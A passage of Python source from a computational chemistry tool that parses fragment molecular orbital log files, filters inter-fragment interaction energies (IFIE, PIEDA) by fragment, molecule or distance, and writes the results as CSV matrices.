'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'USER-MP2', 'MP3-IFIE','USER-MP3', 'PADE[2/1]' ]\n elif self.logMethod == 'CCPT':\n self.icolumn = ['I', 'J', 'DIST', 'DIMER-ES', 'HF-IFIE', 'MP2-IFIE', 'GRIMME-MP2', 'MP3-IFIE','GRIMME-MP3', 'MP4-IFIE' ]\n self.getpbflag(self.tgtlogs)\n\n # self.logMethod = 'MP2'\n if self.matrixtype != 'frags-frags' and (self.logMethod == 'MP3' or self.logMethod == 'CCPT'):\n print('Error: ' + self.logMethod + ' mode for this mode is unsupported yet.')\n sys.exit()\n\n # pb python-based capture only in this version.\n if self.pbflag:\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(self.tgtlogs)\n df = self.getifiedf(ifie)\n self.ifdf = df\n\n pidf = self.getpiedadf(pieda)\n self.pidf = pidf\n\n # pbpieda\n pbifie, pbpieda, solvterm = self.read_pbifiepieda(self.tgtlogs)\n pbifdf = self.getifiedf(pbifie, solvterm)\n self.pbifdf = pbifdf\n\n pbpidf = self.getpbpiedadf(pbpieda)\n self.pbpidf = pbpidf\n\n # debug write\n # print(self.pbifdf)\n # sys.exit()\n return self\n\n if self.f90soflag is True:\n print(\"use fortran library\")\n ifpidfs = self.read_ifpif90(self.tgtlogs)\n self.ifdf = ifpidfs[0]\n self.pidf = ifpidfs[1]\n # print(self.ifdf)\n # print(self.pidf)\n\n else:\n ifie, pieda, momene, dimene, bsse = self.read_ifiepieda(self.tgtlogs)\n df = self.getifiedf(ifie)\n self.ifdf = df\n\n pidf = self.getpiedadf(pieda)\n self.pidf = pidf\n\n return\n\n\n def readifiewrap(self, item1=None, item2=None, item3=None):\n '''read ifie and pieda\n Args:\n item1: tgtlogs\n item2: tgt1frag\n item3: tgt2type\n Returns:\n '''\n\n # param setup\n self.setupreadparm(item1, item2, item3)\n\n # multi mode (read and filter)\n if self.anlmode == 'multi':\n self.readmultiifie()\n # single mode\n else:\n self.readsingleifie()\n\n return self\n\n def getisdisp(self, tgtlog):\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if len(Items) <= 2:\n continue\n if Items[0:3] == ['Disp', '=', 'ON']:\n print('MP2-LRD single shot mode')\n return True\n return False\n\n def getlogmethod(self, tgtlog):\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if len(Items) <= 2:\n continue\n if Items[0:2] == ['Method', '=']:\n print('logMethod =', Items[2])\n return Items[2]\n\n def getpbflag(self, tgtlog):\n self.pbflag = False\n f = open(tgtlog, 'r')\n for line in f:\n Items = line.split()\n if len(Items) <= 2:\n continue\n if Items[0:2] == ['EFFECT', '=']:\n if Items[2] == 'ON':\n self.pbflag = True\n print('PB effect =', Items[2])\n if Items[0:3] == ['##', 'CHECK', 'AVAILABLE']:\n break\n\n return\n\n def setupreadparm(self, item1=None, item2=None, item3=None):\n '''setup read parameter\n Args:\n item1: tgt1\n item2: tgt2\n item3: tgt3\n Returns:\n tgtlogs: list of log files\n tgtpdbs: list of pdb files\n tgttimes: list of time steps\n '''\n\n tgtlogs = []\n tgtpdbs = []\n tgttimes = []\n\n if self.anlmode == 'multi' and self.tgt2type == 'molname':\n self.rpdbflag = True\n\n # multi mode\n if self.anlmode == 'multi':\n # item1: tgt1\n # item2: tgt2\n print('tgt2type:', self.tgt2type)\n\n # setup tgttimes, logs, and pdbs\n for i in range(self.start, self.end+1, self.interval):\n tgttimes.append(str(i).zfill(self.zp))\n tgtlogs.append(self.ilog_head + str(i).zfill(self.zp) + self.ilog_tail)\n print('tgtlogs', tgtlogs)\n\n # setup tgt1frag\n if item1 is not None:\n print('type', type(item1))\n if type(item1) == str:\n if '-' in item1:\n tgt = item1.split('-')\n print('tgt', tgt)\n self.tgt1frag = [i for i in range(int(tgt[0]), int(tgt[1]) + 1)]\n if self.tgt1frag in self.tgt1frag:\n del self.tgt1frag[self.tgt1frag.index(self.tgt1frag)]\n else:\n self.tgt1frag = list(map(int, item1.split(',')))\n print(self.tgt1frag)\n else:\n self.tgt1frag = item1\n\n self.tgtlogs = tgtlogs\n self.tgttimes = tgttimes\n\n # setup tgt2frag\n if self.tgt2type == 'frag':\n if item2 != None:\n print('type', type(item2))\n if item2[-1] == '-':\n print('check tgt2 frags')\n\n self.tgt2frag = []\n for i in range(len(tgtlogs)):\n self.resname_perfrag, tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n nf = self.getlognf(tgtlogs[i], self.fragmode)\n tgt = item2.split('-')[0]\n print('tgt', tgt)\n tgt2frag = [i for i in range(int(tgt), nf + 1)]\n self.tgt2frag.append(tgt2frag)\n\n elif type(item2) == str:\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt', tgt)\n self.tgt2frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n if self.tgt1frag in self.tgt2frag:\n del self.tgt2frag[self.tgt2frag.index(self.tgt1frag)]\n else:\n self.tgt2frag = list(map(int, item2.split(',')))\n print(self.tgt2frag)\n else:\n self.tgt2frag = [item2]\n if type(self.tgt2frag) == list:\n for dfrag in self.exceptfrag:\n try:\n del self.tgt2frag[self.tgt2frag.index(dfrag)]\n print('- Info: del frag', dfrag, 'from tgt2')\n except:\n pass\n print('tgt1frag, tgt2frag', self.tgt1frag, self.tgt2frag)\n\n\n if self.tgt2type == 'molname':\n if item2 != None:\n self.tgt2molname = item2\n print('tgt1frag, tgt2mol', self.tgt1frag, self.tgt2molname)\n\n\n if self.rpdbflag == True:\n nfs = []\n molnames_perrec = []\n resnamenonums_perfrag = []\n self.assignmolname = False\n for i in range(len(tgtlogs)):\n self.resname_perfrag, tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n tgtpdbs.append(tgtpdb)\n# if self.fragmode == 'auto':\n# print('Error: auto fragment in mol mode is not suppoted yet.')\n# sys.exit()\n nf = self.getlognf(tgtlogs[i], self.fragmode)\n nfs.append(nf)\n molnames_perrec.append(self.resnames)\n resnamenonums_perfrag.append(self.resnamenonum_perfrag)\n self.nfs = nfs\n self.molnames_perrec = molnames_perrec\n self.resnamenonums_perfrag = resnamenonums_perfrag\n self.tgtpdbs = tgtpdbs\n\n # single mode\n # item1 log\n # item2 tgt1\n # item3 tgt2\n else:\n if item1 is not None:\n self.tgtlogs = item1\n if item2 is not None:\n if self.anlmode == 'mol' and self.selecttype == 'molid':\n self.tgtmolid = int(item2)\n else:\n print('item2', item2)\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt1', tgt)\n self.tgt1frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n\n# if type(eval(item2)) != list:\n# self.tgt1frag = [item2]\n# else:\n# self.tgt1frag = eval(item2)\n\n else:\n self.tgt1frag = list(map(int, item2.split(',')))\n print(self.tgt1frag)\n\n if self.anlmode == 'fraginmol' or self.anlmode == 'mol':\n if type(self.tgtmolid) == str:\n if '-' in self.tgtmolid:\n tgt = self.tgtmolid.split('-')\n print('tgtmol', tgt)\n self.tgtmolid = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n self.tgtmolid = [eval(self.tgtmolid)]\n\n elif type(self.tgtmolid) == int:\n self.tgtmolid = [self.tgtmolid]\n\n if self.tgt2type == 'frag' or self.tgt2type == 'dist':\n if item2 is not None:\n # print('type tgt2', type(item2))\n if type(item2) == str:\n if '-' in item2:\n tgt = item2.split('-')\n print('tgt1', tgt)\n self.tgt1frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n print('check2')\n self.tgt1frag = list(map(int, item2.split(',')))\n print(self.tgt1frag)\n\n# if type(eval(item2)) != list:\n# self.tgt1frag = [eval(item2)]\n# else:\n# self.tgt1frag = eval(item2)\n else:\n self.tgt1frag = [item2]\n\n if self.tgt2type == 'frag':\n if item3 is not None:\n # print('type tgt2', type(item3))\n if type(item3) == str:\n if '-' in item3:\n tgt = item3.split('-')\n print('tgt2', tgt)\n self.tgt2frag = [ i for i in range(int(tgt[0]), int(tgt[1]) + 1) ]\n else:\n self.tgt2frag = list(map(int, item3.split(',')))\n print(self.tgt2frag)\n # self.tgt2frag = [eval(item3)]\n else:\n self.tgt2frag = [item3]\n\n if self.matrixtype == 'frags-frags':\n print(self.tgt1frag, self.tgt2frag)\n# dp = set(self.tgt1frag) & set(self.tgt2frag)\n# if len(dp) != 0:\n# print('Error! tgt1 and tgt2 is duplicate')\n# sys.exit()\n\n if type(self.tgt2frag) == list:\n for dfrag in self.exceptfrag:\n try:\n del self.tgt2frag[self.tgt2frag.index(dfrag)]\n print('- Info: del frag', dfrag, 'from tgt2')\n except:\n pass\n\n # PIEDA\n if self.abinit_ver == 'rev16' or self.abinit_ver == 'rev17':\n self.pcolumn = ['I', 'J', 'ES', 'EX', 'CT-mix', 'Solv(ES)', 'DI(MP2)', 'q(I=>J)']\n\n # get resname reference\n if self.addresinfo == True or self.rpdbflag == True or self.anlmode == 'fraginmol':\n print('\\n## read reference resname')\n if type(self.tgtlogs) == list:\n for i in range(len(self.tgtlogs)):\n self.resname_perfrag, self.tgtpdb = self.getlogorpdbfrag(self.tgtlogs[i])\n if len(self.resname_perfrag) != 0:\n break\n else:\n print('cannot read frag data:', self.tgtlogs[i])\n else:\n self.resname_perfrag, self.tgtpdb = self.getlogorpdbfrag(self.tgtlogs)\n\n # print section\n print ('\\n## input summary')\n try:\n print('- tgtlogs:', self.tgtlogs)\n print('- anlmode:', self.anlmode)\n print('- tgtfrag:', self.tgt1frag, self.tgt2frag)\n print('- anlmode:' ,self.anlmode)\n print('- fragmode:', self.fragmode)\n print('- NP:', self.pynp)\n print('- addresflag', self.addresinfo)\n except:\n pass\n print('## input summary end\\n')\n\n ### read fraginfo section\n# frags = []\n# if self.fragmode != 'manual':\n# frags = self.read_fraginfo(self.tgtlogs)\n# # print('frags', frags)\n#\n# if self.fragmode == 'hybrid':\n# getf = frags.pop(hyfrag-1)\n# for i in range(self.hynum):\n# frags.append(getf)\n# # print('frags', frags)\n#\n# self.frags = frags\n\n ## filter section\n def filterifiewrap(self, dist=None, myifdf=None, mypidf=None, is_pb=False):\n\n tgt2type = self.tgt2type\n if dist is not None:\n self.dist = dist\n # frag mode\n if self.anlmode == 'frag':\n if self.matrixtype == 'frags-frags':\n self.gettgtdf_n2ffmatrix(myifdf)\n self.gettgtpidf_n2ffmatrix(mypidf, is_pb)\n\n else:\n if tgt2type in ['dist', 'dimer-es']:\n print(self.ifdf)\n tgtdf, ifdf_filter = self.gettgtdf_fd(self.ifdf)\n self.ifdf_filter = pd.merge(ifdf_filter,\n self.pidf, on=['I', 'J'], how='left')\n print(self.ifdf_filter)\n\n if self.pbflag is True:\n pbtgtdf, pbifdf_filter = self.gettgtdf_fd(self.pbifdf)\n self.pbifdf_filter = pd.merge(\n pbifdf_filter, self.pbpidf, on=['I', 'J'], how='left')\n print(self.pbifdf_filter)\n\n elif tgt2type == 'frag':\n self.ifdf_filters = []\n self.pbifdf_filters = []\n\n if type(self.tgt1frag) == int:\n self.tgt1frag == [self.tgt1frag]\n if type(self.tgt2frag) == int:\n self.tgt1frag == [self.tgt2frag]\n for tgt1 in self.tgt1frag:\n ifdf_filter = self.gettgtdf_ffs(self. ifdf, tgt1, self.tgt2frag)\n self.ifdf_filters.append(\n pd.merge(ifdf_filter, self.pidf, on=['I','J'], how='left'))\n if self.pbflag is True:\n pbifdf_filter = self.gettgtdf_ffs(\n self.pbifdf, tgt1, self.tgt2frag)\n self.pbifdf_filters.append(\n pd.merge(pbifdf_filter, self.pbpidf, on=['I', 'J'], how='left'))\n print(self.ifdf_filters[0].head())\n if self.pbflag is True:\n print(self.pbifdf_filters[0].head())\n\n # mol-mol mode\n if self.anlmode == 'mol':\n # ifie\n df = self.ifdf\n# if self.selecttype == 'fragid':\n# tgtmolfrags = self.getmolfrags(self.tgt1frag[0], df)\n# print('target-frags:', molfrags)\n if self.selecttype == 'molid':\n nf = self.getlognf(self.tgtlogs, self.fragmode)\n molfragss = self.getallmolfrags(self.tgtlogs, df, nf)\n print('frags_permol\\n', molfragss)\n tgtmolfrags = []\n for tgtmolid in self.tgtmolid:\n tgtmolfrags.append(molfragss[tgtmolid-1])\n elif self.selecttype == 'molname':\n sys.exit()\n\n self.tgtmolfrags = tgtmolfrags\n print('self.tgtmolfrags:', self.tgtmolfrags)\n\n # IFIE and pieda\n ifdf_frag_mols = pd.DataFrame()\n ifdfmol_mols = pd.DataFrame(columns=['I', 'J'] + self.ifdfsumcolumn)\n ifdfmolsums = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n for i in range(len(self.tgtmolfrags)):\n contactmolfrags, ifdf_frag_mol, ifdfmol_mol, ifdfmolsum = self.getifiesummol(df, tgtmolfrags[i], self.tgtmolid[i])\n\n # self.contactmolfrags = contactmolfrags\n print(ifdf_frag_mol)\n print(ifdfmol_mol)\n print(ifdfmolsum)\n\n ifdf_frag_mols = ifdf_frag_mols.append(ifdf_frag_mol)\n ifdfmol_mols = ifdfmol_mols.append(ifdfmol_mol)\n ifdfmolsums = ifdfmolsums.append(ifdfmolsum)\n\n self.ifdf_frag_mols = ifdf_frag_mols\n self.ifdfmol_mols = ifdfmol_mols\n self.ifdfmolsums = ifdfmolsums\n\n # fraginmol mode\n if self.anlmode == 'fraginmol':\n ifdf_filters = pd.DataFrame()\n ifdfsums = pd.DataFrame(columns=self.ifdfsumcolumn)\n\n df = self.ifdf\n tgt1_lofrag = self.tgt1_lofrag\n tgt2_lofrag = self.tgt2_lofrag\n tgt2molname = self.tgt2molname\n nf = self.getlognf(self.tgtlogs, self.fragmode)\n print('nf', nf)\n molfragss = self.getallmolfrags(self.tgtlogs, df, nf)\n print('molfragss', molfragss)\n print('len_molfragss', len(molfragss))\n print('resnames', self.resnames)\n print('self.resnames', len(self.resnames))\n\n print('resnames_perfrag', self.resnamenonum_perfrag)\n print('len self.resnames', len(self.resnamenonum_perfrag))\n\n rname_perfrag = self.resnamenonum_perfrag\n\n tgtmolfrags = []\n\n rname_permol = copy.deepcopy(molfragss)\n for j in range(len(rname_permol)):\n # if type(molfragss[j]) == list:\n for k in range(len(molfragss[j])):\n num = copy.deepcopy(molfragss[j][k]) - 1\n rname_permol[j][k] = rname_perfrag[num]\n\n tgt2_glofrags = []\n # print('resnames', self.resnames)\n for i in range(len(rname_permol)):\n if tgt2molname in rname_permol[i]:\n # print(self.resnames[i], tgt2molname)\n tgt2frag = molfragss[i][tgt2_lofrag - 1]\n tgt2_glofrags.append(tgt2frag)\n print('tgt2_glofrags', tgt2_glofrags)\n\n # tgtmol loop\n for tgtmol in self.tgtmolid:\n tgtmol = tgtmol - 1\n\n tgt1_glofrag = molfragss[tgtmol][tgt1_lofrag - 1]\n print('tgt1glofrag', tgt1_glofrag)\n print('centermolfrag:', tgt1_glofrag)\n print('tgt2molname', tgt2molname)\n tgtdf = df[df['I'] == tgt1_glofrag]\n tgtdf = tgtdf.append(df[df['J'] == tgt1_glofrag])\n tgtdf = tgtdf[tgtdf['DIST'] < self.dist]\n tgtdf = tgtdf[tgtdf['DIST'] != 0.0]\n\n # ifdf_filters = pd.DataFrame()\n tgtdf_filter = tgtdf[(tgtdf['I'].isin(tgt2_glofrags)) | (tgtdf['J'].isin(tgt2_glofrags))]\n # print('ifdf_filters\\n', tgtdf_filter)\n\n # PIEDA\n ifdf_filter = pd.merge(tgtdf_filter, self.pidf, on=['I', 'J'], how='left')\n ifdf_filters = ifdf_filters.append(ifdf_filter)\n\n # print(ifdf_filter)\n HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum, GRIMME_sum, \\\n JUNG_sum, HILL_sum, ES_sum, EX_sum, CT_sum, DI_sum, \\\n q_sum = self.getsumdf(ifdf_filter)\n\n ifdfsum = pd.Series([HF_IFIE_sum, MP2_IFIE_sum, PR_TYPE1_sum,\n GRIMME_sum, JUNG_sum, HILL_sum, ES_sum,\n EX_sum, CT_sum, DI_sum, q_sum],\n index=self.ifdfsumcolumn, name='mol' + str(tgtmol+1))\n ifdfsums = ifdfsums.append(ifdfsum)\n\n # self.tgt1_glofrag = tgt1_glofrags\n # self.tgt2_glofrags = tgt2_glofrags\n self.ifdf_filters = ifdf_filters\n self.ifdfsums = ifdfsums\n\n return self\n\n def writecsvwrap(self, head=None, word='', pbwrite=False):\n '''writecsvwrap\n\n writecsv section\n\n Args:\n head (str): head of csv file name\n word (str): word of csv file name\n pbwrite (bool): write csv file or not\n\n Returns:\n self (object)\n '''\n\n print('## Write Section')\n path = 'csv'\n tgt2type = self.tgt2type\n if os.path.exists('csv') is False:\n os.mkdir('csv')\n\n if self.anlmode == 'frag':\n if head is None:\n head = os.path.splitext(self.tgtlogs)[0].split('/')[-1]\n\n if self.matrixtype == 'frags-frags':\n if self.logMethod == 'MP2':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.prmp2corrdf,\n self.mp2tdf,\n self.prmp2tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'Distance'\n ]\n elif self.logMethod == 'MP3':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp3corrdf,\n self.mp25corrdf,\n self.usermp3corrdf,\n self.mp2tdf,\n self.mp3tdf,\n self.mp25tdf,\n self.usermp3tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'MP3corr',\n 'MP25corr',\n 'USER-MP3corr',\n 'MP2total',\n 'MP3total',\n 'MP25total',\n 'USER-MP3total',\n 'Distance'\n ]\n elif self.logMethod == 'CCPT':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp3corrdf,\n self.mp4corrdf,\n self.mp25corrdf,\n self.mp35corrdf,\n self.mp2tdf,\n self.mp3tdf,\n self.mp4tdf,\n self.mp25tdf,\n self.mp35tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'MP3corr',\n 'MP4corr',\n 'MP25corr',\n 'MP35corr',\n 'MP2total',\n 'MP3total',\n 'MP4total',\n 'MP25total',\n 'MP35total',\n 'Distance'\n ]\n if self.logMethod == 'HF':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'Distance'\n ]\n if self.logMethod == 'HF+D':\n datadfs = [\n self.esdf,\n self.exdf,\n self.ctdf,\n self.hfdf,\n self.mp2corrdf,\n self.mp2tdf,\n self.distdf\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'DILRDcorr',\n 'LRDtotal',\n 'Distance'\n ]\n\n tgt1str = str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1])\n tgt2str = str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n for i in range(len(datadfs)):\n # rename index-columns\n if self.addresinfo:\n datadfs[i].rename(index=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')',\n columns=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n\n ocsv = head + '_frag' + str(tgt1str) + '-frag' + str(tgt2str) + '-' + word + names[i] + '-ffmatrix.csv'\n datadfs[i].T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv + ' was created.')\n\n if pbwrite:\n if self.addresinfo:\n self.solvesdf.rename(index=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')',\n columns=lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n\n ocsv = head + '_frag' + str(tgt1str) + '-frag' + str(tgt2str) + '-' + word + 'SolvES-ffmatrix.csv'\n self.solvesdf.T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv + ' was created.')\n\n else:\n if self.tgt2type in ['dist', 'dimer-es']:\n tgtid = self.tgt1frag[0]\n try:\n ohead = head + '-' + str(tgtid) + '-' + frags[tgtid - 1]\n except:\n ohead = head + '-' + str(tgtid)\n\n if self.tgt2type == 'dist':\n oifie = ohead + '-ifie_' + 'dist' + str(self.dist) + '.csv'\n else:\n oifie = ohead + '-ifie_dimer-es-false.csv'\n\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filter.I = self.ifdf_filter.I.replace(val1, val2)\n self.ifdf_filter.J = self.ifdf_filter.J.replace(val1, val2)\n\n print(self.ifdf_filter.I)\n\n self.ifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n\n if self.pbflag:\n try:\n ohead = head + '-' + str(tgtid) + '-' + frags[tgtid - 1]\n except:\n ohead = head + '-' + str(tgtid)\n\n if self.tgt2type == 'dist':\n oifie = ohead + '-pbifie_' + 'dist' + str(self.dist) + '.csv'\n else:\n oifie = ohead + '-pbifie_dimer-es-false.csv'\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.pbifdf_filter.I = self.pbifdf_filter.I.replace(val1, val2)\n self.pbifdf_filter.J = self.pbifdf_filter.J.replace(val1, val2)\n\n print(self.pbifdf_filter.I)\n\n self.pbifdf_filter.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n elif self.tgt2type == 'frag':\n\n tgt1s = self.tgt1frag\n count = 0\n for tgt1 in tgt1s:\n ohead = head + '-frag' + str(tgt1) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n oifie = ohead + '-ifie.csv'\n\n ifdf_filter = self.ifdf_filters[count]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_filter.I = ifdf_filter.I.replace(val1, val2)\n ifdf_filter.J = ifdf_filter.J.replace(val1, val2)\n\n ifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n count += 1\n # N:1 sheet\n for j in range(len(self.ifdf_filters)):\n if j == 0:\n ifdf_fil_n1 = self.ifdf_filters[j].fillna(0.0)\n # pidf_fil_n1 = self.pidf_filters[j]\n else:\n ifdf_fil_n1 += self.ifdf_filters[j].fillna(0.0).values\n\n print(self.ifdf_filters[j])\n # pidf_fil_n1 += self.pidf_filters[j].values\n\n ohead = head + '-frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1]) + 'n-1sum'\n oifie = ohead + '-ifie.csv'\n\n ifdf_fil_n1 = ifdf_fil_n1.reset_index(drop=True)\n\n if self.addresinfo:\n ifdf_fil_n1[\"I\"] = self.resname_perfrag[int(self.tgt1frag[0])-1] + '(' + str(self.tgt1frag[0]) + ')' + '-' + \\\n self.resname_perfrag[int(self.tgt1frag[-1])-1] + '(' + str(self.tgt1frag[-1]) + ')'\n ifdf_fil_n1[\"J\"] = self.tgt2frag\n\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n ifdf_fil_n1.J = ifdf_fil_n1.J.replace(val1, val2)\n else:\n # print(self.tgt1frag)\n ifdf_fil_n1[\"I\"] = str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1])\n ifdf_fil_n1[\"J\"] = self.tgt2frag\n\n del ifdf_fil_n1['DIMER-ES']\n del ifdf_fil_n1['DIST']\n\n ifdf_fil_n1.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n # pb\n if self.pbflag:\n count = 0\n for tgt1 in tgt1s:\n ohead = head + '-frag' + str(tgt1) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n oifie = ohead + '-pbifie.csv'\n\n pbifdf_filter = self.pbifdf_filters[count]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n pbifdf_filter.I = pbifdf_filter.I.replace(val1, val2)\n pbifdf_filter.J = pbifdf_filter.J.replace(val1, val2)\n\n pbifdf_filter.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was generated.')\n count += 1\n\n # N:1 sheet\n for j in range(len(self.pbifdf_filters)):\n if j == 0:\n pbifdf_fil_n1 = self.pbifdf_filters[j]\n # pidf_fil_n1 = self.pidf_filters[j]\n else:\n pbifdf_fil_n1 += self.pbifdf_filters[j].values\n # pidf_fil_n1 += self.pidf_filters[j].values\n\n ohead = head + '-frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1]) + 'n-1sum'\n oifie = ohead + '-ifie.csv'\n\n pbifdf_fil_n1 = pbifdf_fil_n1.reset_index(drop=True)\n\n if self.addresinfo:\n pbifdf_fil_n1[\"I\"] = self.resname_perfrag[int(self.tgt1frag[0])-1] + '(' + str(self.tgt1frag[0]) + ')' + '-' + \\\n self.resname_perfrag[int(self.tgt1frag[-1])-1] + '(' + str(self.tgt1frag[-1]) + ')'\n pbifdf_fil_n1[\"J\"] = self.tgt2frag\n\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n pbifdf_fil_n1.J = pbifdf_fil_n1.J.replace(val1, val2)\n else:\n pbifdf_fil_n1[\"I\"] = self.tgt1frag[0] + '-' + self.tgt1frag[-1]\n pbifdf_fil_n1[\"J\"] = self.tgt2frag\n\n del pbifdf_fil_n1['DIMER-ES']\n del pbifdf_fil_n1['DIST']\n\n pbifdf_fil_n1.to_csv(path + '/' + oifie)\n\n print(path + '/' + oifie, 'was generated.')\n\n if self.anlmode == 'multi':\n head = self.ilog_head.split('/')[-1]\n if tgt2type == 'frag':\n\n if self.matrixtype == 'times-frags':\n\n if self.is_disp:\n datadfs = [\n self.esdfs,\n self.exdfs,\n self.ctdfs,\n self.hfdfs,\n self.mp2corrdfs,\n self.prmp2corrdfs,\n self.mp2tdfs,\n self.prmp2tdfs,\n self.distdfs,\n self.didfs,\n self.erestdfs\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'distance',\n 'LRD',\n 'PRMP2Erest',\n ]\n else:\n datadfs = [\n self.esdfs,\n self.exdfs,\n self.ctdfs,\n self.hfdfs,\n self.mp2corrdfs,\n self.prmp2corrdfs,\n self.mp2tdfs,\n self.prmp2tdfs,\n self.distdfs\n ]\n names = [\n 'ES',\n 'EX',\n 'CT',\n 'HF',\n 'MP2corr',\n 'PRMP2corr',\n 'MP2total',\n 'PRMP2total',\n 'distance',\n ]\n\n tgt2str = str(self.tgt2frag[0]) + '-' + str(self.tgt2frag[-1])\n if self.depth(self.tgt2frag) >= 2:\n tgt2str = str(self.tgt2frag[0][0]) + '-end'\n\n print('--- out files ---')\n # i:type, j:tgt1frag\n for i in range(len(datadfs)):\n sum2df = pd.DataFrame(index=datadfs[i][0].columns)\n for j in range(len(datadfs[i])):\n tgt1frag = self.tgt1frag[j]\n ocsv = head + '_frag' + str(tgt1frag) + '-frag' + str(tgt2str) + '-' + names[i] + '-tfmatrix.csv'\n if self.addresinfo:\n datadfs[i][j].rename(index = lambda x: self.resname_perfrag[int(x)-1] + '(' + str(x) + ')', inplace=True)\n datadfs[i][j].T.to_csv(path + '/' + ocsv)\n print(path + '/' + ocsv)\n\n # gen tgtfrag1 sum matrix\n if j == 0:\n sum1df = datadfs[i][j]\n else:\n sum1df = sum1df + datadfs[i][j]\n\n # gen tgtfrag2 sum matrix\n sum2dfbuf = datadfs[i][j].sum()\n sum2dfbuf.name = tgt1frag\n sum2df = pd.concat([sum2df, sum2dfbuf], axis=1)\n\n osum1csv = head + '_frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(tgt2str) + '-' + names[i] + '-sumtfmatrix.csv'\n sum1df.T.to_csv(path + '/' + osum1csv)\n print(path + '/' + osum1csv)\n\n osum2csv = head + '_frag' + str(self.tgt1frag[0]) + '-' + str(self.tgt1frag[-1]) + '-frag' + str(tgt2str) + '-' + names[i] + '-sum2matrix.csv'\n sum2df.to_csv(path + '/' + osum2csv)\n print(path + '/' + osum2csv)\n\n else:\n tgt1frag = self.tgt1frag[0]\n tgt2frag = self.tgt2frag[0]\n\n if self.addresinfo:\n for i in range(1, len(self.resname_perfrag)+1):\n val1 = i\n val2 = self.resname_perfrag[i-1] + '(' + str(val1) + ')'\n self.ifdf_filters.I = self.ifdf_filters.I.replace(val1, val2)\n self.ifdf_filters.J = self.ifdf_filters.J.replace(val1, val2)\n\n oifie = 'frag' + str(tgt1frag) + '-frag' + str(tgt2frag) + '-ifie.csv'\n self.ifdf_filters.to_csv(path + '/' + oifie)\n print(path + '/' + oifie, 'was created.')\n\n if tgt2type in ['dist', 'dimer-es']:\n\n tgt1frag = self.tgt1frag[0]\n\n if tgt2type == 'molname':\n tgt2molname = self.tgt2molname\n oifie = 'frag' + str(tgt1frag) + '-' + str(tgt2molname) + '-dist' + str(self.dist) + '-ifiesum.csv'\n oifiedt = 'frag' + str(tgt1frag) + '-' + str(tgt2molname) + '-dist' + str(self.dist) + 